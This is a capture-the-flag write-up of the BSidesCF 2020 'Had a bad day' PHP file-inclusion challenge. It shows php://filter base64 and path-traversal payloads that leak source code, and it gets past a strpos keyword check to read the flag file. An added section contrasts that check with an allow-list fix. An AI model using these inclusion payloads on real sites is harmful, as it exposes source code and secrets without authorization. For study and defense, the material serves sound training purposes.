[BSidesCF 2020]Had a bad day
Reference: file inclusion vulnerabilities
Steps
Click one of the buttons and notice that the URL changes:
url/index.php?category=woofers
Changing the parameter value produces this response:
Sorry, we currently only support woofers and meowers.
Continue changing the parameter:
url/index.php?category=woofers.php;flag
Response:
Warning: include(woofers.php;flag.php): failed to open stream: No such file or directory in /var/www/html/index.php on line 37
Warning: include(): Failed opening 'woofers.php;flag.php' for inclusion (include_path='.:/usr/local/lib/php') in /var/www/html/index.php on line 37
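The warnings show that this is a file inclusion: the parameter is passed to include() with .php appended.
Construct: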
url/index.php?category=php://filter/convert.base64-encode/resource=index
Base64-decode the source that is returned; the PHP code in it is:
<?php
$file = $_GET['category'];
if (isset($file))
{
    if (strpos($file, "woofers") !== false || strpos($file, "meowers") !== false || strpos($file, "index")) {
        include ($file . '.php');
    }
    else {
        echo "Sorry, we currently only support woofers and meowers.";
    }
}
?>
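strpos(s1, s2) looks up the position of string s2 inside string s1. The check only requires that s2 is contained somewhere, so it passes as long as category contains woofers, meowers or index.
So construct: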
url/index.php?category=php://filter/convert.base64-encode/resource=index/../flag
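Because the flag is commented out it is not displayed directly. Nesting the keyword inside the pseudo-protocol also retrieves the flag: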
url/index.php?category=php://filter/convert.base64-encode/index/resource=flag
or
url/index.php?category=php://filter/read=index/convert.base64-encode/resource=flag
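
The substring check explained above, set beside an allow-list lookup that keeps the parameter out of include() entirely. This is an added example, not part of the original write-up or the challenge's code: the function names substring_check and resolve_category and the sample value 'index' are assumptions, while the other sample inputs are the category values shown on this page.

```php
<?php
// The check from the decoded source, unchanged in behaviour: it passes on any
// input that merely contains an allowed word. strpos() returns an offset, so
// the bare strpos($file, "index") is falsy when "index" sits at offset 0.
function substring_check(string $file): bool
{
    return strpos($file, "woofers") !== false
        || strpos($file, "meowers") !== false
        || strpos($file, "index");
}

// Hardened form: the parameter is only a key into a fixed map, so no
// user-controlled byte (wrapper, "../", ";") ever reaches include().
function resolve_category(string $category): ?string
{
    $pages = [
        'woofers' => __DIR__ . '/woofers.php',
        'meowers' => __DIR__ . '/meowers.php',
    ];
    return $pages[$category] ?? null;
}

// Inputs taken from the page, plus the constructed value 'index'.
$samples = [
    'woofers',
    'woofers.php;flag',
    'php://filter/convert.base64-encode/resource=index',
    'php://filter/convert.base64-encode/resource=index/../flag',
    'index',
];

foreach ($samples as $s) {
    printf(
        "%-60s substring=%-6s allowlist=%s\n",
        $s,
        substring_check($s) ? 'pass' : 'reject',
        resolve_category($s) !== null ? 'pass' : 'reject'
    );
}
```

In the handler, include the path returned by resolve_category() and return the "only support woofers and meowers" message when it is null.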